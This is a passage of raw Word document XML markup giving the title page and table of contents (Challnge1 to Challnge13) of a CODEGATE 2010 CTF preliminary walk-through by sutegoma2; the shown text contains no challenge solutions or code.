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C86" w:rsidRDefault="008A4C86" w:rsidP="009934CF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:t>CODEGATE2010 CTF Preriminaly walk-throughs</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009934CF" w:rsidRDefault="009934CF">
      <w:pPr>
        <w:pStyle w:val="Div"/>
        <w:spacing w:after="280" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="009934CF">
      <w:pPr>
        <w:pStyle w:val="Div"/>
        <w:spacing w:after="280" w:afterAutospacing="1"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">by sutegoma2 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009934CF" w:rsidRDefault="009934CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009934CF" w:rsidRDefault="009934CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009934CF" w:rsidRDefault="009934CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009934CF" w:rsidRDefault="009934CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009934CF" w:rsidRDefault="009934CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009934CF" w:rsidRDefault="009934CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009934CF" w:rsidRDefault="009934CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009934CF" w:rsidRDefault="009934CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009934CF" w:rsidRDefault="009934CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00680149" w:rsidRDefault="009934CF" w:rsidP="009934CF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009934CF">
        <w:rPr>
          <w:rStyle w:val="shorttext"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Contents</w:t>
      </w:r>
      <w:r w:rsidR="00AA5FD6" w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="009934CF">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \t "challenge,1" </w:instrText>
      </w:r>
      <w:r w:rsidR="00AA5FD6" w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00680149" w:rsidRDefault="00AA5FD6">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Century" w:eastAsia="MS Mincho" w:hAnsi="Century" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc257340751" w:history="1">
        <w:r w:rsidR="00680149" w:rsidRPr="001A3D16">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Challnge1</w:t>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc257340751 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00680149" w:rsidRDefault="00AA5FD6">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Century" w:eastAsia="MS Mincho" w:hAnsi="Century" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc257340752" w:history="1">
        <w:r w:rsidR="00680149" w:rsidRPr="001A3D16">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Challnge2</w:t>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc257340752 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00680149" w:rsidRDefault="00AA5FD6">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Century" w:eastAsia="MS Mincho" w:hAnsi="Century" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc257340753" w:history="1">
        <w:r w:rsidR="00680149" w:rsidRPr="001A3D16">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Challnge3</w:t>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc257340753 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00680149" w:rsidRDefault="00AA5FD6">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Century" w:eastAsia="MS Mincho" w:hAnsi="Century" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc257340754" w:history="1">
        <w:r w:rsidR="00680149" w:rsidRPr="001A3D16">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Challnge4</w:t>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc257340754 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00680149" w:rsidRDefault="00AA5FD6">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Century" w:eastAsia="MS Mincho" w:hAnsi="Century" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc257340755" w:history="1">
        <w:r w:rsidR="00680149" w:rsidRPr="001A3D16">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Challnge5</w:t>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc257340755 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00680149" w:rsidRDefault="00AA5FD6">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Century" w:eastAsia="MS Mincho" w:hAnsi="Century" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc257340756" w:history="1">
        <w:r w:rsidR="00680149" w:rsidRPr="001A3D16">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Challnge6</w:t>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc257340756 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00680149" w:rsidRDefault="00AA5FD6">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Century" w:eastAsia="MS Mincho" w:hAnsi="Century" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc257340757" w:history="1">
        <w:r w:rsidR="00680149" w:rsidRPr="001A3D16">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Challnge7</w:t>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc257340757 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00680149" w:rsidRDefault="00AA5FD6">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Century" w:eastAsia="MS Mincho" w:hAnsi="Century" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc257340758" w:history="1">
        <w:r w:rsidR="00680149" w:rsidRPr="001A3D16">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Challnge8</w:t>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc257340758 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00680149" w:rsidRDefault="00AA5FD6">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Century" w:eastAsia="MS Mincho" w:hAnsi="Century" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc257340759" w:history="1">
        <w:r w:rsidR="00680149" w:rsidRPr="001A3D16">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Challnge9</w:t>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc257340759 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00680149" w:rsidRDefault="00AA5FD6">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Century" w:eastAsia="MS Mincho" w:hAnsi="Century" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc257340760" w:history="1">
        <w:r w:rsidR="00680149" w:rsidRPr="001A3D16">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Challnge10</w:t>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc257340760 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00680149" w:rsidRDefault="00AA5FD6">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Century" w:eastAsia="MS Mincho" w:hAnsi="Century" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc257340761" w:history="1">
        <w:r w:rsidR="00680149" w:rsidRPr="001A3D16">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Challnge11</w:t>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc257340761 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00680149" w:rsidRDefault="00AA5FD6">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Century" w:eastAsia="MS Mincho" w:hAnsi="Century" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc257340762" w:history="1">
        <w:r w:rsidR="00680149" w:rsidRPr="001A3D16">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Challnge12</w:t>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc257340762 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>14</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00680149" w:rsidRDefault="00AA5FD6">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Century" w:eastAsia="MS Mincho" w:hAnsi="Century" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc257340763" w:history="1">
        <w:r w:rsidR="00680149" w:rsidRPr="001A3D16">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Challnge13</w:t>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00680149">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc257340763 \h </w:instrText>
        </w:r>
